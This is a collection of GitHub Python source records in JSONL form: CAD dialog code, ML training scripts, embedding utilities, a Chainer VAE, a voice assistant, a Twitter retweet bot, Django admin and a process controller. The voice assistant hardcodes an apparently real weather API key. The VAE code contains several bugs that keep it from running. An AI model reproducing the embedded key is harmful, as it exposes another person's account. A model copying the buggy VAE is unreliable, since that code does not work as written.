\"-DESC\")\n except Exception as e:\n PipeCad.SetCurrentItem(\"/\" + aNameItem.text() + \"-DESC\")\n # try\n\n aCcdeItem = PipeCad.CurrentItem()\n aCcdeItem.Connection = aNameItem.text()\n aCcdeItem.Description = aDescItem.text()\n # if\n # for\n PipeCad.CommitTransaction()\n\n self.comboBoxDelegate.setupCoco(self.cocoTable)\n # setupTypes\n\n def addRow(self):\n aRow = self.tableWidget.rowCount\n self.tableWidget.insertRow(aRow)\n # addRow\n\n def deleteRow(self):\n aRow = self.tableWidget.currentRow()\n self.tableWidget.removeRow(aRow)\n # deleteRow\n\n def addColumn(self):\n aColumn = self.tableWidget.columnCount\n self.tableWidget.insertColumn(aColumn)\n # addColumn\n\n def deleteColumn(self):\n aColumn = self.tableWidget.currentColumn()\n self.tableWidget.removeColumn(aColumn)\n # deleteColumn\n\n def accept(self):\n if self.cocoTable is None:\n return\n # if\n\n aRowCount = self.tableWidget.rowCount\n aColumnCount = self.tableWidget.columnCount\n if aRowCount < 1:\n return\n # if\n\n aMemberList = self.cocoTable.Member\n if len(aMemberList) > 0:\n PipeCad.SetCurrentItem(aMemberList[-1])\n else:\n PipeCad.SetCurrentItem(self.cocoTable)\n # if\n\n PipeCad.StartTransaction(\"Modify COCO Table\")\n for r in range(aRowCount):\n aTypeItem = self.tableWidget.item(r, 0)\n if aTypeItem is not None and len(aTypeItem.text()) > 0:\n for c in range(1, aColumnCount):\n aConnItem = self.tableWidget.item(r, c)\n if aConnItem is not None and len(aConnItem.text()) > 0:\n try:\n PipeCad.CreateItem(\"COCO\", aTypeItem.text() + \"-\" + aConnItem.text())\n aCocoItem = PipeCad.CurrentItem()\n aCocoItem.Ctype1 = aTypeItem.text()\n aCocoItem.Ctype2 = aConnItem.text()\n except Exception as e:\n pass\n # try\n # if\n\n # for\n # if\n # for\n\n PipeCad.CommitTransaction()\n\n QDialog.accept(self)\n # accept\n# ModifyDialog\n\n# Singleton Instance.\naModifyDlg = ModifyDialog(PipeCad)\n\ndef Modify():\n aModifyDlg.setCocoTable()\n aModifyDlg.show()\n# Create\n","repo_name":"eryar/PipeCAD","sub_path":"lib/pipecad/CocoTable.py","file_name":"CocoTable.py","file_ext":"py","file_size_in_byte":12670,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"21"} +{"seq_id":"2986129046","text":"from pymongo import MongoClient\nimport numpy as np\nimport pandas as pd\nimport os\nfrom my_tools import get_bill_data, process_corpus, read_jsonl_file\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import recall_score, precision_score, accuracy_score, f1_score, confusion_matrix\n\nfrom sklearn.externals import joblib\n\n\n# get bill data\nprint('-------------------')\nprint('Loading original and preprocessed data for vectorizing and modeling...')\ndata, in_progress = get_bill_data()\n\n\ncorpus_with_labels = read_jsonl_file('/home/ubuntu/galvanize_capstone/data/nlp/corpus_with_labels.jsonl')\ncorpus_df = pd.DataFrame(list(corpus_with_labels))\n\nX = corpus_df['document']\ny = corpus_df['label'].astype(int)\n\n\n\n# create stratified train-test split\nprint('-------------------')\nprint('Doing train-test split...')\nX_train, X_test, y_train, y_test = train_test_split(X, y, stratify = y)#, random_state = 123)\n\n\n# Already vectorized using pickle_nlp_boosting_model.py\n# vectorizing ~30M dimensions with n-grams, l1 norm (simple avg), or l2 (avg**2)\n# use_idf=True gives more weight to words, n_grams that appear less frequently in the corpus\n# sublinear_tf=True reduces the bias of length\nprint('-------------------')\nprint('Vectorizing...')\ntfvect = TfidfVectorizer(ngram_range = (1, 4), \n max_features = 6000000,\n norm = 'l2', #default value\n use_idf = True, #default value\n sublinear_tf = True)\n\n\n\n# # load the TfidfVectorizer if needed\n# print('-------------------')\n# print('Loading the pickled TfidfVectorizer...')\n# pickle_path = 'pickle_files/tfidfVectorizer.pkl'\n# tfvect = joblib.load(pickle_path)\n# print('Pickled vectorizer loaded.')\n\n\n# print('-------------------')\n# print('Vectorizing bill text...')\nX_train_vec = tfvect.fit_transform(X_train)\n# X_train_vec = tfvect.transform(X_train) # for pickled model\nX_test_vec = tfvect.transform(X_test)\n\n\nprint('-------------------')\nprint('Getting Features...')\nfeatures = tfvect.get_feature_names()\n\n\n# dump the TfidfVectorizer\nprint('-------------------')\nprint('Pickling the TfidfVectorizer...')\npickle_path = 'pickle_files/tfidfVectorizer.pkl'\nif os.path.exists(pickle_path):\n os.remove(pickle_path)\njoblib.dump(tfvect, pickle_path)\nprint('Pickling complete.')\n\n\nprint('-------------------')\nprint('Training Random Forest Classifier with vectorized results...')\nrf = RandomForestClassifier(n_estimators = 100, \n max_features = 3000000,\n max_depth = 3, \n min_samples_split = 2, \n min_samples_leaf = 1,\n class_weight = 'balanced',\n n_jobs = -1)\nrf.fit(X_train_vec, y_train)\n\nrf_y_pred = rf.predict(X_test_vec)\nrf_y_pred_proba = rf.predict_proba(X_test_vec)\n\nprint('F1 Score:\\t\\t{:.4f}'.format(f1_score(y_test, rf_y_pred)))\nprint('Recall Score:\\t\\t{:.4f}'.format(recall_score(y_test, rf_y_pred)))\nprint('Precision Score:\\t{:.4f}'.format(precision_score(y_test, rf_y_pred)))\nprint('Accuracy Score:\\t\\t{:.4f}'.format(accuracy_score(y_test, rf_y_pred)))\nprint('Confusion Matrix')\nprint(confusion_matrix(y_test, rf_y_pred))\n\n\n# dump the RandomForest Classifier\nprint('Pickling the Random Forest Classifier...')\npickle_path = 'pickle_files/nlp_randomForest.pkl'\nif os.path.exists(pickle_path):\n os.remove(pickle_path)\njoblib.dump(rf, pickle_path)\nprint('All Pickling Complete. DATA SCIENCE!!!')","repo_name":"magdiel85281/galvanize_capstone","sub_path":"src/pickle_nlp_rf_model.py","file_name":"pickle_nlp_rf_model.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25084325801","text":"import argparse\nimport numpy as np\nimport sys, os\nfrom math import floor\nfrom collections import OrderedDict as odict\nfrom contextlib import contextmanager\nimport struct as st\nimport functools\nimport re\nfrom tqdm import tqdm\n\n#@contextmanager\ndef open_w2v(filename):\n if os.path.isdir(filename):\n print('path of a directory given using vectors.bin')\n filename = os.path.join(filename, 'vectors.bin')\n if not os.path.isfile(filename):\n raise ValueError(f'file {filename} not found!!')\n \n with open(filename, 'rb') as mfobj:\n m = mfobj.read()\n \n # get length of first line\n length1st = 0\n while m[length1st] != ord('\\n') and length1st < 100:\n length1st += 1\n if length1st == 100:\n raise ValueError('First line lenght could no be found')\n\n #print(m[0].decode('utf8'))\n #s = st.Struct('ii')\n #m_it = m.__iter__()\n head_dims = st.unpack(f'<{length1st}s', m[:length1st])\n n_vocab, n_dim = map(int,head_dims[0].strip().split())\n print(f\"Vocabulary size: {n_vocab} and dimension of embed: {n_dim}\")\n embed = {}\n #[next(m_it) for _ in range(11)]\n cnt = 11\n for line_cnt in range(n_vocab):\n word = ''\n while True:\n next_char = st.unpack('<1s', m[cnt:cnt+1])[0].decode('utf8')\n cnt += 1\n if next_char == ' ':\n break\n else:\n word += next_char\n #print(word)\n vec = np.zeros(n_dim)\n for k in range(n_dim):\n vec[k] = st.unpack(' was referenced and defined')\n embed[''] = np.array([float(x) for x in vals[1:]]) \n return embed\n\n\n\ndef generate(vect_dict):\n '''\n get a sample of approximately N words out of the vector file\n '''\n\n # don't need the vocabulary\n #with open(args.vocab_file, 'r') as f:\n # words = [x.rstrip().split(' ')[0] for x in f.readlines()]\n lengths = {}\n for v in vect_dict:\n sumv = np.sum(np.abs(vect_dict[v]))\n probs = vect_dict[v]/sumv\n\n lengths[v] = np.sqrt(np.sum([np.float(x)**2 for x in probs]))\n \n return odict(sorted(lengths.items(), key=lambda t: t[1]))\n\ndef nearest(word_vec, unit_embed, n_near=10):\n '''\n Returns the `n_near` closest vectors to the `word_vec` vector\n NOTE that `unit_embed` needs to be unitary vectors\n '''\n dist_dict = {}\n if isinstance(word_vec, str):\n word_vec = unit_embed[word_vec]\n unit_word_vec = word_vec/np.linalg.norm(word_vec)\n for w, v in unit_embed.items():\n #dist_dict[w] = cos_dist(v, word_vec)\n dist_dict[w] = unit_word_vec.dot(v)\n return sorted(dist_dict.items(), key=lambda pair: pair[1], reverse=True)[:n_near]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('words', nargs='+')\n parser.add_argument('--out_file', default='vocab.txt', type=str,\n help='file to write the sorted lengths of the vectors')\n parser.add_argument('--vectors_file', default='vectors.txt', type=str)\n #parser.add_argument('--skip_n', default=1, type=int)\n args = parser.parse_args()\n with open(args.vectors_file, 'r') as f:\n vec_dict = {}\n for index, line in enumerate(f):\n vals = line.rstrip().split(' ')\n if vals[0] in args.words:\n vec_dict[vals[0]] = np.array([np.float(k) for k in vals[1:]])\n\n sorted_dict = generate(vec_dict)\n with open(args.out_file, 'a') as out_f:\n for o in sorted_dict:\n out_f.write(\"{:<15} {}\\n\".format(o, sorted_dict[o]))\n\n\n","repo_name":"lab156/arxivDownload","sub_path":"embed/embed_utils.py","file_name":"embed_utils.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"36046624387","text":"import numpy as np\nimport argparse\nimport chainer\nfrom chainer import cuda, Function, gradient_check, report, training, utils, Variable\nfrom chainer import datasets, iterators, optimizers, serializers\nfrom chainer import Link, Chain, ChainList\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer.training import extensions\nimport net.cbr\n\nclass Encoder(Chain):\n def __init__(self, in_ch, dim_z):\n super().__init__(\n w = chainer.initializers.Normal(0.02),\n e1 = CBR(in_ch, 32, bn=True, sample='down', activation=F.leaky_relu, dropout=False),\n e2 = CBR(32, 64, bn=True, sample='down', activation=F.leaky_relu, dropout=False),\n e3 = CBR(64, 256, bn=True, sample='down', activation=F.leaky_relu, dropout=False),\n e4 = CBR(256, 512, bn=True, sample='down', activation=F.leaky_relu, dropout=False), \n e5_mu = L.Convolution2D(512, 512, 4, stride=4),\n e5_sigma = L.Convolution2D(512, 512, 4, stride=4),\n out_mu = L.Linear(512, dim_z),\n out_sigma = L.Linear(512, dim_z)\n )\n def __call__(self, x):\n h = x\n h = F.max_pooling_2d(self.e1(h, test=False), 2)\n h = F.max_pooling_2d(self.e2(h, test=False), 2)\n h = F.max_pooling_2d(self.e3(h, test=False), 2)\n h = F.average_pooling_2d(self.e4(h, test=False), 2)\n mu = self.out_mu(F.sigmoid(e5_mu(h)))\n sigma = self.out_sigma(F.sigmoid(e5_sigma(h)))\n return mu, sigma\n\nclass Decoder(Chain):\n def __init__(self, dim_z):\n super().__init__(\n lin=L.Linear(dim_z, 32 * 4 * 4),\n norm0=L.BatchNormalization(32),\n d1 = CBR(32, 512, bn=True, sample='up', activation=F.leaky_relu, dropout=False, ksize=4, stride=2, padding=1),\n d2 = CBR(64, 256, bn=True, sample='up', activation=F.leaky_relu, dropout=False, ksize=4, stride=2, padding=1),\n d3 = CBR(32, 64, bn=True, sample='up', activation=F.leaky_relu, dropout=False, ksize=4, stride=2, padding=1),\n d_r = L.Deconvolution2D(512, 256, 4, stride=2, pad=1),\n d_g = L.Deconvolution2D(512, 256, 4, stride=2, pad=1),\n d_b = L.Deconvolution2D(512, 256, 4, stride=2, pad=1)\n )\n\n def __call__(self, z):\n h = F.reshape(self.lin(z), (z.data.shape[0], 32, 4, 4))\n h = self.norm0(h)\n h = self.e1(h, test=False)\n h = self.e2(h, test=False)\n h = self.e3(h, test=False)\n r = self.dc_r(h)\n g = self.dc_g(h)\n b = self.dc_b(h)\n return r, g, b\n\nclass VAE(Chain):\n def __init__(self, k=512):\n self.k = k\n super().__init__(\n enc = Encoder(k),\n dec = Decoder(k)\n )\n\n def __call__(self, x, test=False, k=4):\n batch_size = x.data.shape[0]\n w = x.data.shape[2]\n tr, tg, tb = chainer.functions.split_asix(x, 3, 1)\n tr = F.reshape(tr, (batch_size * w * w, ))\n tg = F.reshape(tg, (batch_size * w * w, ))\n tb = F.reshape(tb, (batch_size * w * w, ))\n\n x = chainer.Variable(x.data.astype('f'))\n\n z_mu, z_var = self.enc(x, test)\n loss_kl = F.gaussian_kl_divergence(z_mu, z_var) / batch_size / self.k # log of var?\n \n \n\nexit()\nparser = argparse.ArgumentParser(description='Chainer example: MNIST')\nparser.add_argument('--gpu', '-g', type=int, default=-1,\n help='GPU ID (negative value indicates CPU)')\nargs = parser.parse_args()\n\ntrain_data = FontImageDataset(10000, train=True, flatten=False)\ntest_data = FontImageDataset(10000, train=False, flatten=False)\ntrain_iter = iterators.SerialIterator(train_data, batch_size=200, shuffle=True)\ntest_iter = iterators.SerialIterator(test_data, batch_size=200, repeat=False, shuffle=False)\n\nmodel = L.Classifier(CNN())\n\nif args.gpu >= 0:\n chainer.cuda.get_device(args.gpu).use() # Make a specified GPU current\n model.to_gpu() # Copy the model to the GPU\n\noptimizer = optimizers.SGD()\noptimizer.setup(model)\n\n#updater = training.StandardUpdater(train_iter, optimizer, device=-1)\nupdater = training.StandardUpdater(train_iter, optimizer, device=args.gpu)\n\ntrainer = training.Trainer(updater, (500, 'epoch'), out='result')\nprint(\"start running\")\n#trainer.extend(extensions.Evaluator(test_iter, model))\ntrainer.extend(extensions.Evaluator(test_iter, model, device=args.gpu))\ntrainer.extend(extensions.LogReport())\ntrainer.extend(extensions.PrintReport(['epoch', 'main/accuracy', 'validation/main/accuracy']))\n#trainer.extend(extensions.PrintReport(['epoch', 'main/accuracy']))\ntrainer.extend(extensions.ProgressBar())\ntrainer.run()\nprint(\"end running\")\n","repo_name":"mizti/vae_test","sub_path":"vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36694615971","text":"\"\"\"\"\r\nImplementation in Tensorflow of the BLSTM model described in:\r\nN. Gkalelis, V. Mezaris, \"Structured Pruning of LSTMs via\r\nEigenanalysis and Geometric Median for Mobile Multimedia\r\nand Deep Learning Applications\", Proc. 22nd IEEE Int.\r\nSymposium on Multimedia (ISM), Dec. 2020.\r\nHistory\r\n-------\r\nDATE | DESCRIPTION | NAME | Organization |\r\n1/07/2020 | first creation | Nikolaos Gkalelis | CERTH-ITI |\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import, division, print_function, unicode_literals\r\n\r\nimport tensorflow as tf\r\n\r\nclass MyLstm(tf.keras.Model):\r\n def __init__(self, num_classes,\r\n weight_decay = 0.005,\r\n sequence_length = 300,\r\n lstm_size = 1024,\r\n video_feature_size = 1024,\r\n audio_feature_size = 128):\r\n super(MyLstm, self).__init__()\r\n\r\n total_feature_size = video_feature_size + audio_feature_size\r\n input_shape = (sequence_length, total_feature_size)\r\n lstm_fw = tf.keras.layers.LSTM(int(lstm_size / 2), return_sequences=True)\r\n lstm_bw = tf.keras.layers.LSTM(int(lstm_size / 2), return_sequences=True, go_backwards=True)\r\n self.bdr = tf.keras.layers.Bidirectional(lstm_fw, backward_layer=lstm_bw, input_shape=input_shape)\r\n self.lstm = tf.keras.layers.LSTM(int(lstm_size))\r\n self.dns = tf.keras.layers.Dense(units=num_classes, activation='sigmoid',\r\n kernel_regularizer=tf.keras.regularizers.l2(weight_decay))\r\n\r\n\r\n def call(self, inputs):\r\n\r\n x1 = self.bdr(inputs)\r\n x2 = self.lstm(x1)\r\n x = self.dns(x2)\r\n\r\n return x, x1, x2\r\n","repo_name":"bmezaris/lstm_structured_pruning_geometric_median","sub_path":"model/mymodels.py","file_name":"mymodels.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4434021457","text":"import pyttsx3 #pip install pyttsx3\nimport speech_recognition as sr #pip install speechRecognition\nimport datetime\nimport wikipedia #pip install wikipedia\nimport webbrowser\nimport os\nimport smtplib\nimport time\nfrom bs4 import BeautifulSoup\nimport requests, json\nimport pyaudio\n\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\n# print(voices[1].id)\nengine.setProperty('voice', voices[0].id)\n\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n\n\ndef wishMe():\n hour = int(datetime.datetime.now().hour)\n strTime = time.strftime(\"%H:%M:\")\n if hour>=0 and hour<12:\n speak(\"Good Morning! the time is\" )\n speak(strTime)\n\n elif hour>=12 and hour<18:\n speak(\"Good Afternoon! the time is\" ) \n speak({strTime})\n\n else:\n speak(\"Good Evening! the time is \" ) \n speak({strTime})\n\n speak(\"Hello Sir. Please tell me how may I help you\") \n\ndef takeCommand():\n #It takes microphone input from the user and returns string output\n\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold = 1\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\") \n query = r.recognize_google(audio, language='en-in')\n print(f\"User said: {query}\\n\")\n\n except Exception as e:\n # print(e) \n print(\"Say that again please...\") \n return \"None\"\n return query\n\n\n\nif True:\n wishMe()\n while True:\n # if 1:\n query = takeCommand().lower()\n\n # Logic for executing tasks based on query\n if 'wikipedia' in query:\n speak('Searching Wikipedia...')\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=2)\n speak(\"According to Wikipedia\")\n print(results)\n speak(results)\n\n elif 'weather' in query:\n api_key = \"7fb0aa01055b31bbbb4c0a84b382d0a5\" #generate your own api key from open weather\n base_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n speak(\"tell me which city\")\n city_name = takeCommand()\n complete_url = base_url + \"appid=\" + api_key + \"&q=\" + city_name\n response = requests.get(complete_url)\n x = response.json()\n if x[\"cod\"] != \"404\":\n y = x[\"main\"]\n current_temperature = y[\"temp\"]\n current_pressure = y[\"pressure\"]\n current_humidiy = y[\"humidity\"]\n z = x[\"weather\"]\n weather_description = z[0][\"description\"]\n r = (\"in \" + city_name + \" Temperature is \" +\n str(int(current_temperature - 273.15)) + \" degree celsius \" +\n \", atmospheric pressure \" + str(current_pressure) + \" hpa unit\" +\n \", humidity is \" + str(current_humidiy) + \" percent\"\n \" and \" + str(weather_description))\n print(r)\n speak(r)\n \n \n elif (\"create a reminder list\" in query or \"reminder\" in query):\n speak(\"What is the reminder?\")\n data = takeCommand()\n speak(\"You said to remember that\" + data)\n reminder_file = open(\"data.txt\", 'a')\n reminder_file.write('\\n')\n reminder_file.write(data)\n reminder_file.close()\n \n elif (\"do you know anything\" in query or \"remember\" in query):\n reminder_file = open(\"data.txt\", 'r')\n speak(\"You said me to remember that: \" + reminder_file.read())\n \n elif 'currency' in query and 'conver' in query:\n speak('I can convert, US dollar into indian rupee, and indian rupee into US dollar. Do you want to continue it?')\n query = takeCommand().lower()\n if 'y' in query or 'sure' in query or 'of course' in query:\n speak('which conversion you want to do? US dollar to indian rupee, or indian rupee to US dollar?')\n query = takeCommand().lower()\n if ('dollar' in query or 'US' in query) and ('to india' in query or 'to rupee' in query):\n speak('Enter US Dollar') \n USD = float(input(\"Enter United States Dollar (USD):\")) \n INR = USD * 81.70\n inr = \"{:.4f}\".format(INR)\n print(f\"{USD} US Dollar is equal to {inr} indian rupee.\")\n speak(f'{USD} US Dollar is equal to {inr} indian rupee.')\n speak(\"If you again want to do currency conversion then say, 'convert currency' \" )\n elif ('india' in query or 'rupee' in query) and ('to US' in query or 'to dollar' in query or 'to US dollar'):\n speak('Enter Indian Rupee')\n INR = float(input(\"Enter Indian Rupee (INR):\")) \n USD = INR/81.70\n usd = \"{:.3f}\".format(USD)\n print(f\"{INR} indian rupee is equal to {usd} US Dollar.\")\n speak(f'{INR} indian rupee is equal to {usd} US Dollar.')\n speak(\"If you again want to do currency conversion then say, 'convert currency' \" )\n else:\n speak(\"I cannot understand what did you say. If you want to convert currency just say 'convert currency'\")\n else:\n print('ok sir')\n\n \n \n","repo_name":"sailee2781/voice-assistant-visually-impaired","sub_path":"voice assistant.py","file_name":"voice assistant.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74741603572","text":"import tweepy\r\n\r\nconsumer_key = \"XXXXXXXXXXXXXXXXXXXXXX\"\r\nconsumer_secret = \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\r\nkey = \"XXXXXXXXXXXXXXXXXXXXX-7S4aSCzUks64BQECoP33dQD45iXm9A\"\r\nsecret = \"XXXXXXXXXXXXXXXXXXXXXXXXXX\"\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(key, secret)\r\n\r\n\r\napi = tweepy.API(auth)\r\n\r\nhashtag = \"python\"\r\n\r\ntweetnum = 5\r\n\r\ntweets = tweepy.Cursor(api.search, hashtag).items(tweetnum)\r\n\r\nfor tweet in tweets:\r\n tweet.retweet()\r\n","repo_name":"ya-nsh/twitterbot","sub_path":"twbot/searchbot.py","file_name":"searchbot.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4722023623","text":"from django.contrib import admin\n\nfrom .models import Store\nfrom .models import Inventory\n\n\nclass StoreList(admin.ModelAdmin):\n list_display = ('store_brand', 'store_addr', 'store_category')\n list_filter = ('store_brand', 'store_category')\n search_fields = ('store_brand',)\n ordering = ['store_brand']\n\n\nclass InventoryList(admin.ModelAdmin):\n list_display = ('inventory_name', 'inventory_amount')\n list_filter = ('inventory_name', 'inventory_amount')\n search_fields = ('inventory_name', 'store')\n ordering = ['inventory_name', 'store']\n\n\nadmin.site.register(Store)\nadmin.site.register(Inventory)\n","repo_name":"snavelycoreyt/Assignment1P1","sub_path":"inventorysystem/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21436518845","text":"#!/root/vMU/vEnv/bin/python3\n\nimport subprocess, os, signal, time, socket, threading, json, psutil, yaml, numpy as np, src.Python_Code.muApi as muApi\nfrom multiprocessing import shared_memory\n\n\n# Service Directory\nmyDir = os.getcwd()\nworkDir = os.path.dirname(os.path.abspath(__file__))\nos.chdir(workDir)\n\nC_buildPath = os.path.join(workDir, 'src', 'C_Build')\nPython_buildPath = os.path.join(workDir, 'src', 'Python_Code')\nPython_Executable = '/root/vMU/vEnv/bin/python3'\n\ntry:\n controllerShm = shared_memory.SharedMemory(name='controller', create=False, size=4)\nexcept:\n controllerShm = shared_memory.SharedMemory(name='controller', create=True, size=4)\ncontroller = np.ndarray((1,), dtype=np.uint32, buffer=controllerShm.buf)\n\ndef getIface():\n for d in psutil.net_if_stats().keys():\n if d != 'lo':\n return str(d)\n return None\n\ndef preload():\n import src.Python_Code.guestConf as guest\n guest.hostUpdate()\n res = subprocess.run(['make', '-f', 'Makefile', 'build'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n if res.returncode != 0:\n print(res.stderr)\n exit(0)\n else:\n print(res.stdout)\n\ndef cleanUp():\n controllerShm.unlink()\n \n res = subprocess.run(['make', '-f', 'Makefile', 'clean'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n if res.returncode != 0:\n print(res.stderr)\n exit(1)\n else:\n print(res.stdout)\n\nclass vMU_Brain:\n def __init__(self) -> None:\n self.tests = {}\n self.sniffer = {}\n self.api = {}\n self.runSniffer()\n time.sleep(0.5)\n self.runAPI()\n\n def send_signal_by_name(self, process_name, signal):\n for process in psutil.process_iter(['pid', 'name']):\n cmd = ' '.join(psutil.Process(process.info['pid']).cmdline())\n if cmd == process_name:\n process_pid = process.info['pid']\n try:\n psutil.Process(process_pid).send_signal(signal)\n except psutil.NoSuchProcess:\n print(f\"Process '{process_name}' not found.\")\n\n def runAPI(self):\n # put pid \n self.api['command'] = f'{Python_Executable} {Python_buildPath}/muApi.py {os.getpid()}'\n self.api['process'] = subprocess.Popen(self.api['command'], shell=True)\n self.api['running'] = True\n \n def stopAPI(self):\n if self.api['running']:\n self.send_signal_by_name(self.api['command'], psutil.signal.SIGTERM)\n self.api['running'] = False\n\n def API_Handler(self, signal1, signal2):\n if controller[0] == muApi.START_CONTINUOUS:\n self.runContinuous()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.STOP_CONTINUOUS:\n self.stopContinuous()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.UPDATE_CONTINUOUS:\n self.updateContinuous()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.START_SEQUENCER:\n self.runSequencer()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.STOP_SEQUENCER:\n self.stopSequencer()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.RESTART_NETWORK:\n self.restartSniffer()\n controller[0] = muApi.NOTHING\n self.send_signal_by_name(self.api['command'], psutil.signal.SIGUSR2)\n\n def runSequencer(self):\n if 'continuous' in self.tests:\n if self.tests['continuous']['running']:\n self.stopContinuous()\n if 'sequencer' in self.tests:\n if self.tests['sequencer']['running']:\n self.stopSequencer()\n self.tests['sequencer'] = {}\n self.tests['sequencer']['command'] = f'{Python_Executable} {Python_buildPath}/sequencer.py'\n self.tests['sequencer']['process'] = subprocess.Popen(self.tests['sequencer']['command'], shell=True)\n self.tests['sequencer']['running'] = True\n\n def stopSequencer(self,):\n if 'sequencer' not in self.tests:\n return\n self.tests['sequencer']['running'] = False\n self.send_signal_by_name(self.tests['sequencer']['command'], psutil.signal.SIGTERM)\n\n def runContinuous(self):\n if 'continuous' in self.tests:\n if self.tests['continuous']['running']:\n print('Continuous already running')\n self.updateContinuous()\n return\n self.tests['continuous'] = {}\n self.tests['continuous']['command'] = f'{Python_Executable} {Python_buildPath}/continuous.py'\n self.tests['continuous']['process'] = subprocess.Popen(self.tests['continuous']['command'], shell=True)\n self.tests['continuous']['running'] = True\n\n def updateContinuous(self,):\n if 'continuous' not in self.tests:\n return\n if self.tests['continuous']['running']:\n self.send_signal_by_name(self.tests['continuous']['command'], psutil.signal.SIGUSR1)\n\n def stopContinuous(self):\n if 'continuous' not in self.tests:\n return\n self.tests['continuous']['running'] = False\n self.send_signal_by_name(self.tests['continuous']['command'], psutil.signal.SIGTERM)\n\n def runSniffer(self):\n with open(\"networkSetup.yaml\", \"r\") as file:\n conf = yaml.safe_load(file)['GoNetwork']\n self.sniffer['config'] = conf\n self.sniffer['command'] = f\"{C_buildPath}/sniffer {conf['macSrc']} {conf['goId']} {getIface()} {'0'}\"\n self.sniffer['process'] = subprocess.Popen(self.sniffer['command'], shell=True)\n self.sniffer['running'] = True\n\n def stopSniffer(self):\n if self.sniffer['running']:\n self.send_signal_by_name(self.sniffer['command'], psutil.signal.SIGTERM)\n self.sniffer['running'] = False\n\n def restartSniffer(self):\n if self.sniffer['running']:\n with open(\"networkSetup.yaml\", \"r\") as file:\n _conf = yaml.safe_load(file)['GoNetwork']\n if _conf != self.sniffer['config']:\n self.stopSniffer()\n self.runSniffer()\n\n def cleanSniffer(self):\n pass\n\n def stopTests(self, name):\n if name in ['continuous', 'all']:\n self.stopContinuous()\n elif name in ['sequencer', 'all']:\n self.stopSequencer()\n\n def stopAll(self):\n self.stopTests('all')\n self.stopSniffer()\n self.stopAPI()\n\ndef stop(signal1 , signal2):\n x.stopAll()\n cleanUp()\n controllerShm.unlink()\n exit(0)\n\nsignal.signal(signal.SIGINT, stop)\nsignal.signal(signal.SIGTERM, stop)\n\npreload()\nx = vMU_Brain()\nsignal.signal(signal.SIGUSR1, x.API_Handler)\n\n# x.runContinuous()\n\nwhile(1):\n time.sleep(1)\n\n# x.stopContinuous()\n\ncleanUp()\n\n\n# x.runContinuous()\n\n# t0 = time.time()\n# while time.time() - t0 < 120:\n# pass","repo_name":"Alailton-jr/Virtual-PAC","sub_path":"vMU/controler.py","file_name":"controler.py","file_ext":"py","file_size_in_byte":6920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4044159935","text":"import pygame\nfrom pygame.constants import K_a, K_d, K_s, K_w\nfrom pygame import Rect\nfrom math import pi, atan2, floor\nfrom weaponController import WeaponController, WeaponTypes\nfrom utils.spriteUtils import GetFramesFromFile\nfrom utils.constants import PLAYER_SIZE, PLAYER_HITBOX_SIZE, TILES_COUNT_X, TILE_SIZE, DATA_PATH\n\nSPEED = 2\nANIMATION_SPEED = 84 # ms\n\nclass Player:\n def __init__(self, game, gameworld):\n self.game = game\n self.gameworld = gameworld\n self.screenSize = pygame.display.get_window_size()\n\n spawn = self.gameworld.FindPlayerSpawn()\n self.posX, self.posY = spawn[0], spawn[1]\n\n self.walkingFrames = GetFramesFromFile(\"playerUnarmed.png\", PLAYER_SIZE)\n self.pistolFrames = GetFramesFromFile(\"playerPistol.png\", PLAYER_SIZE)\n self.rifleFrames = GetFramesFromFile(\"playerRifle.png\", PLAYER_SIZE)\n self.sniperFrames = GetFramesFromFile(\"playerSniper.png\", PLAYER_SIZE)\n self.lmgFrames = GetFramesFromFile(\"playerLmg.png\", PLAYER_SIZE)\n self.animFrameCounter = 0\n self.nextFrameTime = 0\n\n self.image = self.walkingFrames[0]\n self.rotatedImage = self.image\n\n self.weaponController = WeaponController(self, gameworld)\n self.weaponInventory = [WeaponTypes.CROWBAR]\n self.equippedWeaponIndex = 0\n self.ammo = 0\n\n self.SetAnimation(self.weaponInventory[self.equippedWeaponIndex])\n\n def Move(self, pressedKeys):\n self.isMoving 